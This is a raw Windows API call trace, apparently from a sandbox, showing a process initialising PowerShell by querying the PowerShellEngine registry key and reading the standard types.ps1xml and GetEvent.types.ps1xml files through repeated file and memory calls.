	[0090.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0090.637] SetErrorMode (uMode=0x1) returned 0x1
	[0090.637] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d7b0 | out: lpFileInformation=0x16d7b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0090.637] SetErrorMode (uMode=0x1) returned 0x1
	[0090.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0090.640] SetErrorMode (uMode=0x1) returned 0x1
	[0090.640] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7b0 | out: lpFileInformation=0x16d7b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0090.640] SetErrorMode (uMode=0x1) returned 0x1
	[0090.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0090.645] SetErrorMode (uMode=0x1) returned 0x1
	[0090.645] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7b0 | out: lpFileInformation=0x16d7b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0090.645] SetErrorMode (uMode=0x1) returned 0x1
	[0090.649] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0090.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.649] CoTaskMemFree (pv=0x3080c0) 
	[0090.657] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0090.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.657] CoTaskMemFree (pv=0x3080c0) 
	[0090.658] GetACP () returned 0x4e4
	[0090.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0090.786] SetErrorMode (uMode=0x1) returned 0x1
	[0090.787] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0090.787] GetFileType (hFile=0x338) returned 0x1
	[0090.787] SetErrorMode (uMode=0x1) returned 0x1
	[0090.787] GetFileType (hFile=0x338) returned 0x1
	[0090.789] ReadFile (in: hFile=0x338, lpBuffer=0x2eed5e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2eed5e8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0090.791] ReadFile (in: hFile=0x338, lpBuffer=0x2eed5e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2eed5e8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0090.792] ReadFile (in: hFile=0x338, lpBuffer=0x2eed5e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2eed5e8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0090.792] ReadFile (in: hFile=0x338, lpBuffer=0x2eed5e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2eed5e8*, lpNumberOfBytesRead=0x16d6e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0090.792] ReadFile (in: hFile=0x338, lpBuffer=0x2eeca43, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2eeca43*, lpNumberOfBytesRead=0x16d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0090.792] ReadFile (in: hFile=0x338, lpBuffer=0x2eed5e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2eed5e8*, lpNumberOfBytesRead=0x16d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0090.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0090.795] SetErrorMode (uMode=0x1) returned 0x1
	[0090.795] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d660 | out: lpFileInformation=0x16d660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0090.796] SetErrorMode (uMode=0x1) returned 0x1
	[0090.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0090.796] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d748 | out: phkResult=0x16d748*=0x338) returned 0x0
	[0090.797] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d6cc, lpData=0x0, lpcbData=0x16d6c8*=0x0 | out: lpType=0x16d6cc*=0x1, lpData=0x0, lpcbData=0x16d6c8*=0x56) returned 0x0
	[0090.797] CoTaskMemAlloc (cb=0x5a) returned 0x2edab0
	[0090.797] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d69c, lpData=0x2edab0, lpcbData=0x16d698*=0x56 | out: lpType=0x16d69c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d698*=0x56) returned 0x0
	[0090.797] CoTaskMemFree (pv=0x2edab0) 
	[0090.797] RegCloseKey (hKey=0x338) returned 0x0
	[0090.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0090.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0090.936] GetSystemInfo (in: lpSystemInfo=0x16c380 | out: lpSystemInfo=0x16c380*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0090.936] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0090.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0090.955] SetErrorMode (uMode=0x1) returned 0x1
	[0090.956] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0090.956] GetFileType (hFile=0x338) returned 0x1
	[0090.956] SetErrorMode (uMode=0x1) returned 0x1
	[0090.956] GetFileType (hFile=0x338) returned 0x1
	[0091.078] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.079] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.079] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.079] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.079] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.079] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.080] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.080] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.080] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.081] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.081] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.082] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.082] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.082] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.082] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.083] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.083] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.085] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.085] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.085] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.086] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.086] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.086] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.087] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.087] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.087] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.087] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.088] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.088] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.088] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.089] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.089] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.093] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.096] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.097] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.097] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.097] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.097] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.098] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.098] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.098] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0091.098] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x1b4, lpOverlapped=0x0) returned 1
	[0091.098] ReadFile (in: hFile=0x338, lpBuffer=0x2db55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2db55d8*, lpNumberOfBytesRead=0x16d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0091.099] CloseHandle (hObject=0x338) returned 1
	[0091.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0091.099] SetErrorMode (uMode=0x1) returned 0x1
	[0091.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d660 | out: lpFileInformation=0x16d660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0091.099] SetErrorMode (uMode=0x1) returned 0x1
	[0091.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0091.099] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d748 | out: phkResult=0x16d748*=0x338) returned 0x0
	[0091.099] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d6cc, lpData=0x0, lpcbData=0x16d6c8*=0x0 | out: lpType=0x16d6cc*=0x1, lpData=0x0, lpcbData=0x16d6c8*=0x56) returned 0x0
	[0091.099] CoTaskMemAlloc (cb=0x5a) returned 0x25b840
	[0091.099] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d69c, lpData=0x25b840, lpcbData=0x16d698*=0x56 | out: lpType=0x16d69c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d698*=0x56) returned 0x0
	[0091.099] CoTaskMemFree (pv=0x25b840) 
	[0091.100] RegCloseKey (hKey=0x338) returned 0x0
	[0091.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0091.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0092.088] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.094] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.096] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.097] VirtualQuery (in: lpAddress=0x16c430, lpBuffer=0x16d2f0, dwLength=0x30 | out: lpBuffer=0x16d2f0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
